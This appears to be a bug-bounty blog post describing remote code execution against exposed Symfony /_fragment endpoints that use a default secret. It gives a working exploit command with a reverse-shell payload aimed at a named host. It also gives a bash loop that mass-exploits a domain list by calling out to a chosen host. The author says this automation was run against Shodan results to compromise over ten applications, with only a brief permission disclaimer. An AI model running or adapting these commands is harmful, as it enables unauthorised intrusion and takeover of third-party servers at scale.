Hello Hackers, all right?
Many may say that the title of this article is a strategy to attract people, but that is not the objective. The goal here is to share the knowledge and success I’ve had with this exploration.
Obs.: Only explore sites that you have permission to.
One day I was looking at some articles around here and I came across the title of the article “How I hacked 28 sites at once [RCE]” and as I was already studying more about this type of attack, it caught my attention.
I encourage everyone to read the article because it is very complete, in fact I leave my thanks to Al1z4deh:~# echo “Welcome” for sharing the knowledge! Thanks! Follow his medium.
When I saw that it was Symfony, I soon remembered that I had already seen this in some recon in the past. Soon I went in search of the host and I will refer to example.com and it was still exposed. So I decided to query the path /_fragment detailed in the article mentioned above and the page was different due to the active debug.
Even though it was different, I continued with the exploration using the script below. As usual, I read the code to understand what was happening and how to exploit this vulnerability.
When executing the line of code below, I noticed that the site returned an error talking about a possible overflow and also the file was not saving as expected. I believe it to be a bug in the application itself that was being tested.
After the error I decided to just remove the out.txt output, believing that it would trigger the command directly on the screen for me and as expected it happened!
After that I decided to check if I had access to a reverse shell, checking if there was any control that would bar the output to the internet and to my surprise, that didn’t exist.
python3 secret_fragment_exploit.py 'https://m4cddr.com/app_dev.php/_fragment' --method 1 --secret 'ThisTokenIsNotSoSecretChangeIt' --algo 'sha256' --internal-url 'https://m4cddr.com/app_dev.php/_fragment' --function shell_exec --parameters cmd:'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'That was the result.
How to automate this?
Quickly in my script I created a function that receives some values to exploit this vulnerability automatically.
RCESymfony(){
for i in $(cat domains); do python3 secret_fragment_exploit.py $i/_fragment --method 1 --secret 'ThisTokenIsNotSoSecretChangeIt' --algo 'sha256' --internal-url "$i"/_fragment --function shell_exec --parameters cmd:" curl https://$3" | anew -q RCEsymfony.tmp;done
for i in $(cat RCEsymfony.tmp);do curl $i | anew -q RCEsymfony-$i.txt;done
}The third argument is the DNS server of your choice.
This was the way I found to automate and obviously there are other ways to accomplish this process. That’s up to everyone’s creativity.
I also created a Nuclei template to do this for me, but this is private and I leave it as homework and as an incentive for you to create your own template.
After this automation, I decided to go to Shodan to identify the applications that run this framework and many appeared as expected. So I downloaded this information and ran my automation, where I managed to exploit + 10 applications through this vulnerability.
Notes:
- Never doubt your intuition. Sometimes, you just need time and thinking outside the box to get results that even you wouldn’t expect.
Tks to read this article. Share it if possible!
Again I would like to thank Al1z4deh:~# echo “Welcome” who helped me in this exploration through the article. Tks so much bro!
Follow me!
Twitter: https://twitter.com/m4cddr
